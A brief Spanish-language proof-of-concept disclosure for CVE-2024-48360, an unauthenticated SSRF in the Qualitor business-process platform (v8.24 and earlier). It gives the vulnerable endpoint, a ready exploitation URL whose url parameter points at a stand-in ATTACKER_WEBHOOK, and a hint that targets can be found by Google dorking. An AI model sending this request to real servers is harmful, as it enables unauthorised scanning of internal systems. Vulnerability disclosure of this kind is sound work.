
CVE-2024-48360 Poc
CVE-2024-48360 | Qualitor <= v8.24 SSRF sin autenticación
Qualitor es una plataforma para la gestión de procesos empresariales, y este sistema está presente en varias empresas de Brasil que pueden ser identificadas simplemente mediante el uso de Google dorking.
Nuestro equipo identificó una vulnerabilidad en la aplicación susceptible a SSRF, que permite enumerar sistemas/puertos internos.
Se descubrió que Qualitor v8.24 contiene una falsificación de solicitud del lado del servidor (SSRF) a través del componente /request/viewValidacao.php.
Para explotarlo, solo envía una solicitud a host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK, y recibirás la solicitud desde el servidor vulnerable.

https://www.linkedin.com/in/xvinicius/